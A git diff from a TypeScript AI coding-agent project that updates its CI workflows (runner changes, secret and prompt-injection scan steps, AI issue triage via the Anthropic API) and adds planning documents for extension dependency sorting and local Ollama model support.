diff --git a/.dockerignore b/.dockerignore
new file mode 100644
index 000000000..444ee5c7f
--- /dev/null
+++ b/.dockerignore
@@ -0,0 +1,53 @@
+# ── Build artifacts ──
+dist/
+build/
+coverage/
+*.tsbuildinfo
+
+# ── Dependencies ──
+node_modules/
+packages/*/node_modules/
+
+# ── Environment & secrets ──
+.env
+.env.*
+!.env.example
+.gsd/
+
+# ── IDE & OS ──
+.idea/
+.vscode/
+*.code-workspace
+.DS_Store
+Thumbs.db
+
+# ── Git ──
+.git/
+.github/
+
+# ── Development files ──
+.claude/
+.plans/
+.artifacts/
+.bg-shell/
+.bg_shell
+*.log
+*.swp
+*.swo
+*~
+tmp/
+.cache/
+
+# ── Native build artifacts ──
+native/
+target/
+
+# ── Test fixtures ──
+tests/
+
+# ── Lock files (npm is canonical via package-lock.json) ──
+pnpm-lock.yaml
+bun.lock
+
+# ── Tarballs ──
+*.tgz
diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS
new file mode 100644
index 000000000..f54b9a409
--- /dev/null
+++ b/.github/CODEOWNERS
@@ -0,0 +1,36 @@
+# CODEOWNERS
+# Defines required reviewers per path. GitHub enforces these on PRs.
+# https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/customizing-your-repository/about-code-owners
+#
+# Format: <pattern>  <@user or @org/team>
+# Last matching rule wins.
+
+# Default: maintainers review everything not explicitly matched below
+*                                   @gsd-build/maintainers
+
+# Core agent orchestration — RFC required, senior review only
+packages/pi-agent-core/             @gsd-build/maintainers
+src/resources/extensions/gsd/       @gsd-build/maintainers
+
+# AI/LLM provider integrations
+packages/pi-ai/                     @gsd-build/maintainers
+
+# Terminal UI
+packages/pi-tui/                    @gsd-build/maintainers
+
+# Native bindings — platform-specific, needs careful review
+native/                             @gsd-build/maintainers
+
+# CI/CD and release pipeline — high blast radius
+.github/                            @gsd-build/maintainers
+scripts/                            @gsd-build/maintainers
+Dockerfile                          @gsd-build/maintainers
+
+# Security-sensitive files — always require maintainer sign-off
+.secretscanignore                   @gsd-build/maintainers
+scripts/secret-scan.sh              @gsd-build/maintainers
+scripts/install-hooks.sh            @gsd-build/maintainers
+
+# Contributor-facing docs — keep accurate, maintainers approve
+CONTRIBUTING.md                     @gsd-build/maintainers
+VISION.md                           @gsd-build/maintainers
diff --git a/.github/workflows/ai-triage.yml b/.github/workflows/ai-triage.yml
index b07fc8c46..04bc87ae8 100644
--- a/.github/workflows/ai-triage.yml
+++ b/.github/workflows/ai-triage.yml
@@ -12,9 +12,9 @@ permissions:
 
 jobs:
   triage:
-    runs-on: ubuntu-latest
+    runs-on: blacksmith-4vcpu-ubuntu-2404
     steps:
-      - uses: actions/checkout@v4
+      - uses: actions/checkout@v6
         with:
           sparse-checkout: |
             VISION.md
@@ -96,41 +96,47 @@ jobs:
             Be generous in your assessment — only flag clear violations. Ambiguous cases should be marked as aligned.
             Do NOT flag issues/PRs that are legitimately reporting bugs or requesting features, even if they could be better written.`;
 
-            const response = await fetch('https://api.anthropic.com/v1/messages', {
-              method: 'POST',
-              headers: {
-                'x-api-key': process.env.ANTHROPIC_API_KEY,
-                'content-type': 'application/json',
-                'anthropic-version': '2023-06-01'
-              },
-              body: JSON.stringify({
-                model: 'claude-haiku-4-5-20251001',
-                max_tokens: 1024,
-                messages: [{ role: 'user', content: prompt }]
-              })
-            });
-
-            if (!response.ok) {
-              const err = await response.text();
-              core.setFailed(`Anthropic API error: ${response.status} ${err}`);
-              return;
-            }
-
-            const data = await response.json();
-            const text = data.content[0].text;
-
-            // Extract JSON from response (handle markdown code blocks)
-            const jsonMatch = text.match(/\{[\s\S]*\}/);
-            if (!jsonMatch) {
-              core.setFailed(`Could not parse Claude response: ${text}`);
+            if (!process.env.ANTHROPIC_API_KEY) {
+              core.warning('Skipping AI triage because ANTHROPIC_API_KEY is not configured.');
               return;
             }
 
             let result;
             try {
+              const response = await fetch('https://api.anthropic.com/v1/messages', {
+                method: 'POST',
+                headers: {
+                  'x-api-key': process.env.ANTHROPIC_API_KEY,
+                  'content-type': 'application/json',
+                  'anthropic-version': '2023-06-01'
+                },
+                body: JSON.stringify({
+                  model: 'claude-haiku-4-5-20251001',
+                  max_tokens: 1024,
+                  messages: [{ role: 'user', content: prompt }]
+                }),
+                signal: AbortSignal.timeout(20000)
+              });
+
+              if (!response.ok) {
+                const err = await response.text();
+                core.warning(`Skipping AI triage after Anthropic API error: ${response.status} ${err}`);
+                return;
+              }
+
+              const data = await response.json();
+              const text = data.content?.[0]?.text ?? '';
+
+              // Extract JSON from response (handle markdown code blocks)
+              const jsonMatch = text.match(/\{[\s\S]*\}/);
+              if (!jsonMatch) {
+                core.warning(`Skipping AI triage because the model response was not parseable JSON: ${text}`);
+                return;
+              }
+
               result = JSON.parse(jsonMatch[0]);
             } catch (e) {
-              core.setFailed(`JSON parse error: ${e.message}\nRaw text: ${text}`);
+              core.warning(`Skipping AI triage after unexpected failure: ${e.message}`);
               return;
             }
             core.info(`Triage result: ${JSON.stringify(result, null, 2)}`);
diff --git a/.github/workflows/build-native.yml b/.github/workflows/build-native.yml
index 3d3bcd9b9..6de0db41f 100644
--- a/.github/workflows/build-native.yml
+++ b/.github/workflows/build-native.yml
@@ -46,8 +46,9 @@ jobs:
 
       - name: Install Rust toolchain
         uses: dtolnay/rust-toolchain@stable
-        with:
-          targets: ${{ matrix.target }}
+
+      - name: Add Rust compilation target
+        run: rustup target add ${{ matrix.target }}
 
       - name: Cache Rust build artifacts
         uses: Swatinem/rust-cache@v2
@@ -97,7 +98,7 @@ jobs:
   publish:
     needs: build
     if: startsWith(github.ref, 'refs/tags/v') || github.event.inputs.publish == 'true'
-    runs-on: ubuntu-latest
+    runs-on: blacksmith-4vcpu-ubuntu-2404
     name: Publish platform packages
 
     steps:
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 30bfa4a6f..17351ebb2 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -1,3 +1,4 @@
+# CI workflow — builds, tests, and gates merges to main
 name: CI
 
 on:
@@ -24,7 +25,8 @@ concurrency:
 
 jobs:
   detect-changes:
-    runs-on: ubuntu-latest
+    timeout-minutes: 2
+    runs-on: blacksmith-4vcpu-ubuntu-2404
     outputs:
       docs-only: ${{ steps.check.outputs.docs-only }}
     steps:
@@ -59,7 +61,8 @@ jobs:
           fi
 
   docs-check:
-    runs-on: ubuntu-latest
+    timeout-minutes: 5
+    runs-on: blacksmith-4vcpu-ubuntu-2404
     needs: detect-changes
     steps:
       - uses: actions/checkout@v6
@@ -70,8 +73,9 @@ jobs:
         run: bash scripts/docs-prompt-injection-scan.sh --diff origin/main
 
   lint:
+    timeout-minutes: 5
     needs: detect-changes
-    runs-on: ubuntu-latest
+    runs-on: blacksmith-4vcpu-ubuntu-2404
     steps:
       - uses: actions/checkout@v6
         with:
@@ -80,6 +84,9 @@ jobs:
       - name: Scan for hardcoded secrets
         run: bash scripts/secret-scan.sh --diff origin/main
 
+      - name: Scan for base64-encoded secrets
+        run: bash scripts/base64-scan.sh --diff origin/main
+
       - name: Ensure .gsd/ is not checked in
         run: |
           if [ -d ".gsd" ]; then
@@ -95,10 +102,17 @@ jobs:
       - name: Validate skill references
         run: node scripts/check-skill-references.mjs
 
+      - name: Require tests with source changes
+        if: github.event_name == 'pull_request'
+        env:
+          PR_BASE_SHA: ${{ github.event.pull_request.base.sha }}
+        run: bash scripts/require-tests.sh
+
   build:
+    timeout-minutes: 15
     needs: detect-changes
     if: needs.detect-changes.outputs.docs-only != 'true'
-    runs-on: ubuntu-latest
+    runs-on: blacksmith-4vcpu-ubuntu-2404
 
     steps:
       - name: Checkout repository
@@ -131,15 +145,21 @@ jobs:
       - name: Run unit tests
         run: npm run test:unit
 
+      - name: Run package tests
+        run: npm run test:packages
+
       - name: Run integration tests
         run: npm run test:integration
 
+      - name: Check test coverage thresholds
+        run: npm run test:coverage
+
   windows-portability:
+    timeout-minutes: 15
     needs: detect-changes
     if: >-
-      needs.detect-changes.outputs.docs-only != 'true' &&
-      github.event_name == 'push' && github.ref == 'refs/heads/main'
-    runs-on: windows-latest
+      needs.detect-changes.outputs.docs-only != 'true'
+    runs-on: blacksmith-4vcpu-windows-2025
 
     steps:
       - name: Checkout repository
@@ -162,3 +182,70 @@ jobs:
 
       - name: Run unit tests
         run: npm run test:unit
+
+      - name: Run package tests
+        run: npm run test:packages
+
+  rtk-portability:
+    timeout-minutes: 20
+    needs: detect-changes
+    if: needs.detect-changes.outputs.docs-only != 'true'
+    strategy:
+      fail-fast: false
+      matrix:
+        include:
+          - label: linux
+            os: blacksmith-4vcpu-ubuntu-2404
+          - label: windows
+            os: blacksmith-4vcpu-windows-2025
+          - label: macos
+            os: macos-15
+    runs-on: ${{ matrix.os }}
+
+    steps:
+      - name: Checkout repository
+        uses: actions/checkout@v6
+
+      - name: Setup Node.js
+        uses: actions/setup-node@v6
+        with:
+          node-version: '24'
+          cache: 'npm'
+
+      - name: Install dependencies
+        env:
+          PLAYWRIGHT_SKIP_BROWSER_DOWNLOAD: '1'
+        run: npm ci
+
+      - name: Validate managed RTK install
+        run: >-
+          node --experimental-strip-types --input-type=module -e
+          "const mod = await import('./src/rtk.ts');
+          const path = mod.getManagedRtkPath(process.platform);
+          if (!mod.validateRtkBinary(path)) {
+            console.error('Managed RTK validation failed:', path);
+            process.exit(1);
+          }
+          console.log('Managed RTK validated at', path);"
+
+      - name: Run RTK-focused portability tests
+        run: >-
+          node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs
+          --experimental-strip-types --experimental-test-isolation=process --test
+          src/tests/rtk.test.ts
+          src/tests/rtk-execution-seams.test.ts
+          src/tests/postinstall.test.ts
+          src/tests/app-smoke.test.ts
+          src/resources/extensions/gsd/tests/custom-verification.test.ts
+          src/resources/extensions/gsd/tests/verification-gate.test.ts
+
+      - name: Generate RTK benchmark evidence
+        if: matrix.label == 'linux'
+        run: node scripts/rtk-benchmark.mjs --output .artifacts/rtk-benchmark.md
+
+      - name: Upload RTK benchmark artifact
+        if: matrix.label == 'linux'
+        uses: actions/upload-artifact@v4
+        with:
+          name: rtk-benchmark-linux
+          path: .artifacts/rtk-benchmark.md
diff --git a/.github/workflows/cleanup-dev-versions.yml b/.github/workflows/cleanup-dev-versions.yml
index ca8896a20..7225a22ea 100644
--- a/.github/workflows/cleanup-dev-versions.yml
+++ b/.github/workflows/cleanup-dev-versions.yml
@@ -11,7 +11,7 @@ permissions:
 jobs:
   cleanup:
     name: Remove stale -dev versions
-    runs-on: ubuntu-latest
+    runs-on: blacksmith-4vcpu-ubuntu-2404
     steps:
       - uses: actions/setup-node@v6
         with:
diff --git a/.github/workflows/pipeline.yml b/.github/workflows/pipeline.yml
index dc5a48b20..75ad95508 100644
--- a/.github/workflows/pipeline.yml
+++ b/.github/workflows/pipeline.yml
@@ -7,7 +7,7 @@ on:
     branches: [main]
 
 concurrency:
-  group: pipeline-${{ github.sha }}
+  group: pipeline-main
   cancel-in-progress: false
 
 permissions:
@@ -18,7 +18,7 @@ jobs:
   dev-publish:
     name: Dev Publish
     if: ${{ github.event.workflow_run.conclusion == 'success' }}
-    runs-on: ubuntu-latest
+    runs-on: blacksmith-4vcpu-ubuntu-2404
     container:
       image: ghcr.io/gsd-build/gsd-ci-builder:latest
       credentials:
@@ -71,7 +71,7 @@ jobs:
   test-verify:
     name: Test & Verify
     needs: dev-publish
-    runs-on: ubuntu-latest
+    runs-on: blacksmith-4vcpu-ubuntu-2404
     steps:
       - uses: actions/checkout@v6
 
@@ -81,8 +81,15 @@ jobs:
           registry-url: https://registry.npmjs.org
           cache: 'npm'
 
-      - name: Install gsd-pi@dev globally
-        run: npm install -g gsd-pi@dev
+      - name: Install gsd-pi@dev globally (with registry propagation retry)
+        run: |
+          for i in 1 2 3 4 5 6; do
+            npm install -g gsd-pi@dev && exit 0
+            echo "Attempt $i failed — waiting 10s for npm registry propagation..."
+            sleep 10
+          done
+          echo "Failed to install gsd-pi@dev after 6 attempts"
+          exit 1
 
       - name: Run smoke tests (against installed binary)
         run: |
@@ -129,7 +136,7 @@ jobs:
   prod-release:
     name: Production Release
     needs: [dev-publish, test-verify]
-    runs-on: ubuntu-latest
+    runs-on: blacksmith-4vcpu-ubuntu-2404
     environment: prod
     steps:
       - uses: actions/checkout@v6
@@ -180,6 +187,7 @@ jobs:
           git add package.json package-lock.json CHANGELOG.md native/npm/*/package.json pkg/package.json packages/pi-coding-agent/package.json
           git commit -m "release: v${RELEASE_VERSION}"
           git tag "v${RELEASE_VERSION}"
+          git pull --rebase origin main
           git push origin main
           git push origin "v${RELEASE_VERSION}"
 
@@ -240,7 +248,7 @@ jobs:
   update-builder:
     name: Update CI Builder Image
     if: ${{ github.event.workflow_run.conclusion == 'success' }}
-    runs-on: ubuntu-latest
+    runs-on: blacksmith-4vcpu-ubuntu-2404
     steps:
       - uses: actions/checkout@v6
         with:
diff --git a/.github/workflows/pr-risk.yml b/.github/workflows/pr-risk.yml
index bde087b7a..2b96c9bb9 100644
--- a/.github/workflows/pr-risk.yml
+++ b/.github/workflows/pr-risk.yml
@@ -14,19 +14,19 @@ permissions:
 jobs:
   risk-check:
     name: Classify changed files and assess risk
-    runs-on: ubuntu-latest
+    runs-on: blacksmith-4vcpu-ubuntu-2404
 
     steps:
       # Checkout the BASE branch — our trusted script and map, not fork code.
       - name: Checkout base
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
         with:
           ref: ${{ github.base_ref }}
 
       - name: Setup Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@v6
         with:
-          node-version: '20'
+          node-version: '24'
 
       # Use the GitHub API to get changed files — no fork code is executed.
       - name: Get changed files
@@ -44,14 +44,14 @@ jobs:
         id: risk
         run: |
           REPORT=$(cat /tmp/changed-files.txt | node scripts/pr-risk-check.mjs --github || true)
-          echo "report<<EOF" >> $GITHUB_OUTPUT
-          echo "$REPORT" >> $GITHUB_OUTPUT
-          echo "EOF" >> $GITHUB_OUTPUT
+          echo "report<<EOF" >> "$GITHUB_OUTPUT"
+          echo "$REPORT" >> "$GITHUB_OUTPUT"
+          echo "EOF" >> "$GITHUB_OUTPUT"
 
           RISK_LEVEL=$(cat /tmp/changed-files.txt | node scripts/pr-risk-check.mjs --json 2>/dev/null \
             | node -e "let d=''; process.stdin.on('data',c=>d+=c); process.stdin.on('end',()=>{ try { console.log(JSON.parse(d).risk) } catch { console.log('low') } })" \
             || echo "low")
-          echo "level=$RISK_LEVEL" >> $GITHUB_OUTPUT
+          echo "level=$RISK_LEVEL" >> "$GITHUB_OUTPUT"
 
       - name: Write step summary
         run: echo "${{ steps.risk.outputs.report }}" >> $GITHUB_STEP_SUMMARY
diff --git a/.github/workflows/regenerate-models.yml b/.github/workflows/regenerate-models.yml
new file mode 100644
index 000000000..f68251158
--- /dev/null
+++ b/.github/workflows/regenerate-models.yml
@@ -0,0 +1,43 @@
+# Regenerates models.generated.ts from live provider APIs weekly.
+# Opens a PR automatically if the model list has changed.
+name: Regenerate model registry
+
+on:
+  schedule:
+    - cron: '0 6 * * 1'  # Every Monday at 06:00 UTC
+  workflow_dispatch:       # Allow manual trigger
+
+permissions:
+  contents: write
+  pull-requests: write
+
+jobs:
+  regenerate:
+    runs-on: blacksmith-4vcpu-ubuntu-2404
+    timeout-minutes: 15
+    steps:
+      - uses: actions/checkout@v6
+
+      - uses: actions/setup-node@v4
+        with:
+          node-version: '22'
+          cache: 'npm'
+
+      - name: Install dependencies
+        run: npm ci
+
+      - name: Regenerate model registry
+        run: npx tsx packages/pi-ai/scripts/generate-models.ts
+
+      - name: Open PR if changed
+        uses: peter-evans/create-pull-request@v7
+        with:
+          commit-message: 'chore(pi-ai): regenerate model registry from upstream APIs'
+          title: 'chore(pi-ai): regenerate model registry from upstream APIs'
+          body: |
+            Automated weekly regeneration of `models.generated.ts` from live provider APIs.
+
+            Run `packages/pi-ai/scripts/generate-models.ts` — no logic changed, output only.
+          branch: chore/auto-regenerate-models
+          labels: chore
+          delete-branch: true
diff --git a/.gitignore b/.gitignore
index 465c44380..5862cc861 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,4 +1,17 @@
 
+# ── Compiled test output ──
+dist-test/
+
+# ── Compiled output in src/ (should only contain .ts source) ──
+src/**/*.js
+src/**/*.js.map
+src/**/*.d.ts
+src/**/*.d.ts.map
+!src/**/*.test.js
+
+# ── Repowise index (local machine-generated cache) ──
+.repowise/
+
 # ── GSD project state (development-only, lives in worktree branches) ──
 package-lock.json
 .claude/
@@ -39,6 +52,9 @@ tmp/
 packages/*/dist/
 packages/*/node_modules/
 
+# ── Scratch/WIP files ──
+preflight-script.ts
+
 # ── GSD baseline (auto-generated) ──
 dist/
 !/pkg/dist/modes/
@@ -52,6 +68,7 @@ TODOS.md
 .planning/
 .audits/
 docs/coherence-audit/
+.plans/
 
 # ── GSD project state (per-worktree, never committed) ──
 .gsd/
@@ -62,3 +79,6 @@ bun.lock
 
 # ── GSD baseline (auto-generated) ──
 .gsd
+
+# ── GSD baseline (auto-generated) ──
+.gsd-id
diff --git a/.mcp.json b/.mcp.json
new file mode 100644
index 000000000..a8e68079d
--- /dev/null
+++ b/.mcp.json
@@ -0,0 +1,14 @@
+{
+  "mcpServers": {
+    "repowise": {
+      "command": "repowise",
+      "args": [
+        "mcp",
+        "/Users/jeremymcspadden/Github/gsd-2",
+        "--transport",
+        "stdio"
+      ],
+      "description": "repowise: codebase intelligence \u2014 docs, graph, git signals, dead code, decisions"
+    }
+  }
+}
diff --git a/.npmrc b/.npmrc
new file mode 100644
index 000000000..b6f27f135
--- /dev/null
+++ b/.npmrc
@@ -0,0 +1 @@
+engine-strict=true
diff --git a/PLAN.md b/.plans/doctor-cleanup-consolidation.md
similarity index 100%
rename from PLAN.md
rename to .plans/doctor-cleanup-consolidation.md
diff --git a/.plans/extension-loading-multi-path.md b/.plans/extension-loading-multi-path.md
new file mode 100644
index 000000000..1cc76f735
--- /dev/null
+++ b/.plans/extension-loading-multi-path.md
@@ -0,0 +1,138 @@
+# Extension Loading: Dependency Sort + Unified Enable/Disable
+
+## Context
+
+GSD-2 has a well-structured extension system with three discovery paths (bundled, global/community, project-local) that are **already wired up** through pi's `DefaultPackageManager.addAutoDiscoveredResources()`. However, two critical gaps remain:
+
+1. `sortExtensionPaths()` (topological dependency sort) is implemented but **never called** — `dependencies.extensions` in manifests is decorative
+2. The GSD extension registry (enable/disable) only applies to **bundled** extensions — community extensions bypass it entirely
+
+### Architecture (Current Flow)
+
+```
+GSD loader.ts
+  → discoverExtensionEntryPaths(bundledExtDir)
+  → filter by GSD registry (isExtensionEnabled)
+  → set GSD_BUNDLED_EXTENSION_PATHS env var
+      ↓
+DefaultResourceLoader.reload()
+  → packageManager.resolve()
+    → addAutoDiscoveredResources()
+      → project: cwd/.gsd/extensions/     (CONFIG_DIR_NAME = ".gsd")
+      → global:  ~/.gsd/agent/extensions/  (includes synced bundled)
+  → loadExtensions(mergedPaths)            ← NO sort, NO registry check on community
+```
+
+### Key Files
+
+| File | Role |
+|------|------|
+| `src/loader.ts` (lines 146-161) | GSD startup — bundled discovery + registry filter |
+| `src/extension-sort.ts` | Topological sort (Kahn's BFS) — EXISTS but NEVER CALLED |
+| `src/extension-registry.ts` | Registry I/O, enable/disable, tier checks |
+| `src/resource-loader.ts` (lines 589-607) | `buildResourceLoader()` — constructs DefaultResourceLoader |
+| `packages/pi-coding-agent/src/core/resource-loader.ts` (lines 311-395) | `reload()` — merges paths, calls `loadExtensions()` |
+| `packages/pi-coding-agent/src/core/package-manager.ts` (lines 1585-1700) | `addAutoDiscoveredResources()` — auto-discovers from .gsd/ dirs |
+| `packages/pi-coding-agent/src/core/extensions/loader.ts` (lines 945-1002) | `discoverAndLoadExtensions()` — DEAD CODE, never invoked |
+
+---
+
+## Plan
+
+### Task 1: Wire topological sort into extension loading
+
+**What:** Call `sortExtensionPaths()` on the merged extension paths before passing them to `loadExtensions()`.
+
+**Where:** `packages/pi-coding-agent/src/core/resource-loader.ts` ~line 381-385
+
+**Before:**
+```typescript
+const extensionsResult = await loadExtensions(extensionPaths, this.cwd, this.eventBus);
+```
+
+**After:**
+```typescript
+import { sortExtensionPaths } from '../../../src/extension-sort.js';
+
+const { sortedPaths, warnings } = sortExtensionPaths(extensionPaths);
+for (const w of warnings) {
+  // emit as diagnostic, not hard error
+}
+const extensionsResult = await loadExtensions(sortedPaths, this.cwd, this.eventBus);
+```
+
+**Consideration:** `sortExtensionPaths` lives in `src/` (GSD side), not in `packages/pi-coding-agent/`. Need to either:
+- (a) Move it into pi-coding-agent as a shared utility, OR
+- (b) Import it cross-package (already done for other GSD→pi imports), OR
+- (c) Call it on the GSD side before paths reach pi — harder since auto-discovered paths are added inside pi's package manager
+
+Option (a) is cleanest — the sort logic only depends on `readManifestFromEntryPath` which is also in `src/extension-registry.ts` but could be duplicated or shared.
+
+### Task 2: Apply GSD registry to community extensions
+
+**What:** When `buildResourceLoader()` in `src/resource-loader.ts` constructs the DefaultResourceLoader, also discover and filter community extensions from `~/.gsd/agent/extensions/` through the GSD registry — same as it already does for `~/.pi/agent/extensions/` paths.
+
+**Where:** `src/resource-loader.ts` → `buildResourceLoader()` (lines 589-607)
+
+**Current code already filters pi extensions:**
+```typescript
+const piExtensionPaths = discoverExtensionEntryPaths(piExtensionsDir)
+  .filter((entryPath) => !bundledKeys.has(getExtensionKey(entryPath, piExtensionsDir)))
+  .filter((entryPath) => {
+    const manifest = readManifestFromEntryPath(entryPath)
+    if (!manifest) return true
+    return isExtensionEnabled(registry, manifest.id)
+  })
+```
+
+**Add similar filtering for community extensions in agentDir:**
+- Discover extensions in `~/.gsd/agent/extensions/` that are NOT bundled
+- Filter through `isExtensionEnabled(registry, manifest.id)`
+- Pass as disabled (via override patterns or pre-filtering) to the resource loader
+
+**Alternative approach:** Hook into `addAutoDiscoveredResources` or the `addResource` call to check the GSD registry. This might be cleaner since the auto-discovery already happens inside pi's package manager.
+
+### Task 3: Emit sort warnings as diagnostics
+
+**What:** Surface dependency warnings (missing deps, cycles) through GSD's diagnostic system so users see them.
+
+**Where:** Wherever the sort is invoked from Task 1.
+
+**Format:**
+```
+⚠ Extension 'gsd-watch' declares dependency 'gsd' which is not installed — loading anyway
+⚠ Extensions 'foo' and 'bar' form a dependency cycle — loading in alphabetical order
+```
+
+### Task 4: Clean up dead code
+
+**What:** The `discoverAndLoadExtensions()` function in `packages/pi-coding-agent/src/core/extensions/loader.ts` (lines 945-1002) is exported but never invoked. The project-local trust model inside it (`getUntrustedExtensionPaths`) also never runs.
+
+**Options:**
+- (a) Remove it entirely — it's dead
+- (b) Mark deprecated — in case upstream pi uses it
+- (c) Leave it — lowest risk
+
+Recommend (b) for now — add `@deprecated` JSDoc so it doesn't grow new callers.
+
+### Task 5: Tests
+
+- **Sort integration test:** Create two extensions where A depends on B. Verify B loads before A after sort.
+- **Registry community test:** Drop a community extension in `~/.gsd/agent/extensions/`, run `gsd extensions disable <id>`, verify it doesn't load.
+- **Conflict test:** Same extension ID in project-local and global — verify project-local wins.
+- **Missing dep test:** Extension declares dependency on non-existent extension — verify warning emitted, extension still loads.
+- **Cycle test:** Two extensions that depend on each other — verify warning, both load.
+
+---
+
+## Follow-up PR (separate)
+
+**Subagent extension forwarding:** Update `src/resources/extensions/subagent/index.ts` to forward ALL extension paths (not just bundled) to child processes. May need a second env var like `GSD_COMMUNITY_EXTENSION_PATHS` or consolidate into `GSD_EXTENSION_PATHS`.
+
+---
+
+## Open Questions
+
+1. **Where should `sortExtensionPaths` live?** Currently in `src/` (GSD side). Needs to be callable from pi's resource-loader. Options: move to pi, keep and import cross-package, or duplicate.
+2. **Should community extensions respect the same registry as bundled?** Or should they have their own enable/disable mechanism? Current plan unifies them.
+3. **Project-local trust:** The TOFU model in the dead `discoverAndLoadExtensions()` never runs. Should `addAutoDiscoveredResources` also gate project-local extensions behind trust? Or is `.gsd/extensions/` in your own project always trusted?
diff --git a/.plans/issue-575-dynamic-model-routing.md b/.plans/issue-575-dynamic-model-routing.md
index c68eab6bf..b32190405 100644
--- a/.plans/issue-575-dynamic-model-routing.md
+++ b/.plans/issue-575-dynamic-model-routing.md
@@ -11,7 +11,7 @@ Users on capped plans (e.g., Claude Pro) exhaust weekly token limits in 15-20 ho
 ## Current Architecture
 
 ### What Exists
-- **Phase-based model config:** Users can set different models per phase via `preferences.md` (research, planning, execution, completion)
+- **Phase-based model config:** Users can set different models per phase via `PREFERENCES.md` (research, planning, execution, completion)
 - **Fallback chains:** Each phase supports `fallbacks: [model1, model2]` for error recovery
 - **Pre-dispatch hooks:** `PreDispatchResult` has a `model` field but it's **never applied** in `auto.ts` — this is a ready-made extension point
 - **Model registry:** `ModelRegistry.getAvailable()` provides all configured models with metadata
diff --git a/web/left-native-tui-main-session-plan.md b/.plans/left-native-tui-main-session-plan.md
similarity index 100%
rename from web/left-native-tui-main-session-plan.md
rename to .plans/left-native-tui-main-session-plan.md
diff --git a/.plans/ollama-native-provider.md b/.plans/ollama-native-provider.md
new file mode 100644
index 000000000..312743c95
--- /dev/null
+++ b/.plans/ollama-native-provider.md
@@ -0,0 +1,241 @@
+# Ollama Extension — First-Class Local LLM Support
+
+## Status: DRAFT — Awaiting approval
+
+## Problem
+
+Ollama support in GSD2 currently requires manual `models.json` configuration. Users must:
+1. Know the OpenAI-compatibility endpoint (`localhost:11434/v1`)
+2. Manually list every model they want to use
+3. Set compat flags (`supportsDeveloperRole: false`, etc.)
+4. Use a dummy API key
+
+There's an `ollama-cloud` provider for hosted Ollama, and a discovery adapter that can list models, but no first-class **local Ollama** extension that "just works."
+
+## Goal
+
+Make Ollama the easiest way to use GSD2 — zero config when Ollama is running locally. All Ollama functionality lives in a single extension: `src/resources/extensions/ollama/`.
+
+## Architecture
+
+Everything is a self-contained extension under `src/resources/extensions/ollama/`. The extension:
+- Auto-detects Ollama on startup via health check
+- Discovers and registers local models with the model registry
+- Provides native Ollama API streaming (not OpenAI shim)
+- Exposes `/ollama` slash commands for model management
+- Registers an LLM-callable tool for model pull/status
+
+Minimal core changes — only `KnownProvider` and `KnownApi` type additions in `pi-ai`, and `env-api-keys.ts` for key resolution. Everything else is in the extension.
+
+## File Structure
+
+```
+src/resources/extensions/ollama/
+├── index.ts                  # Extension entry — wires everything on session_start
+├── ollama-client.ts          # HTTP client for Ollama REST API (/api/*)
+├── ollama-discovery.ts       # Model discovery + capability detection
+├── ollama-provider.ts        # Native /api/chat streaming provider (registers with pi-ai)
+├── ollama-commands.ts        # /ollama slash commands (status, pull, list, remove, ps)
+├── ollama-tool.ts            # LLM-callable tool for model management
+├── model-capabilities.ts     # Known model capability table (context window, vision, reasoning)
+└── types.ts                  # Shared types for Ollama API responses
+```
+
+## Scope
+
+### Phase 1: Auto-Discovery + OpenAI-Compat Routing
+
+**What:** Extension that auto-detects Ollama, discovers models, registers them using the existing `openai-completions` API provider. Zero config needed.
+
+**Extension files:**
+- `ollama/index.ts` — Main entry. On `session_start`:
+  1. Probe `localhost:11434` (or `OLLAMA_HOST`) with 1.5s timeout
+  2. If reachable, discover models via `/api/tags`
+  3. Register discovered models with `ctx.modelRegistry` using correct defaults
+  4. Show status widget if Ollama is detected
+- `ollama/ollama-client.ts` — Low-level HTTP client:
+  - `isRunning()` — `GET /` health check
+  - `getVersion()` — `GET /api/version`
+  - `listModels()` — `GET /api/tags`
+  - `showModel(name)` — `POST /api/show` (details, template, parameters, size)
+  - `getRunningModels()` — `GET /api/ps` (loaded models, VRAM usage)
+  - `pullModel(name, onProgress)` — `POST /api/pull` (streaming progress)
+  - `deleteModel(name)` — `DELETE /api/delete`
+  - `copyModel(source, dest)` — `POST /api/copy`
+  - Respects `OLLAMA_HOST` env var for non-default endpoints
+- `ollama/ollama-discovery.ts` — Enhanced model discovery:
+  - Calls `/api/tags` to get model list
+  - Calls `/api/show` per model (batch, cached) to get:
+    - `details.parameter_size` → estimate context window
+    - `details.families` → detect vision (clip), reasoning (deepseek-r1)
+    - `modelfile` → extract default parameters
+  - Returns enriched `DiscoveredModel[]` with proper capabilities
+- `ollama/model-capabilities.ts` — Known model lookup table:
+  - Maps well-known model families to capabilities
+  - e.g., `llama3.1` → `{ contextWindow: 131072, input: ["text"] }`
+  - e.g., `llava` → `{ contextWindow: 4096, input: ["text", "image"] }`
+  - e.g., `deepseek-r1` → `{ reasoning: true, contextWindow: 131072 }`
+  - e.g., `qwen2.5-coder` → `{ contextWindow: 131072, input: ["text"] }`
+  - Fallback: estimate from parameter count if not in table
+- `ollama/types.ts` — Ollama API response types
+
+**Core changes (minimal):**
+- `packages/pi-ai/src/types.ts` — Add `"ollama"` to `KnownProvider`
+- `packages/pi-ai/src/env-api-keys.ts` — Add `"ollama"` key resolution (returns `"ollama"` placeholder — no real key needed)
+- `src/onboarding.ts` — Add `"ollama"` to provider selection list
+- `src/wizard.ts` — Add `ollama` entry (no key required)
+
+**Model registration details:**
+Each discovered model registers as:
+```typescript
+{
+  id: "llama3.1:8b",           // from /api/tags
+  name: "Llama 3.1 8B",        // humanized
+  api: "openai-completions",    // uses existing provider
+  provider: "ollama",
+  baseUrl: "http://localhost:11434/v1",
+  cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
+  reasoning: false,             // from capabilities table
+  input: ["text"],              // from capabilities table
+  contextWindow: 131072,        // from capabilities table or /api/show
+  maxTokens: 16384,             // conservative default
+  compat: {
+    supportsDeveloperRole: false,
+    supportsReasoningEffort: false,
+    supportsUsageInStreaming: false,
+    maxTokensField: "max_tokens",
+  },
+}
+```
+
+**Behavior:**
+- `gsd --list-models` shows all locally-pulled Ollama models automatically
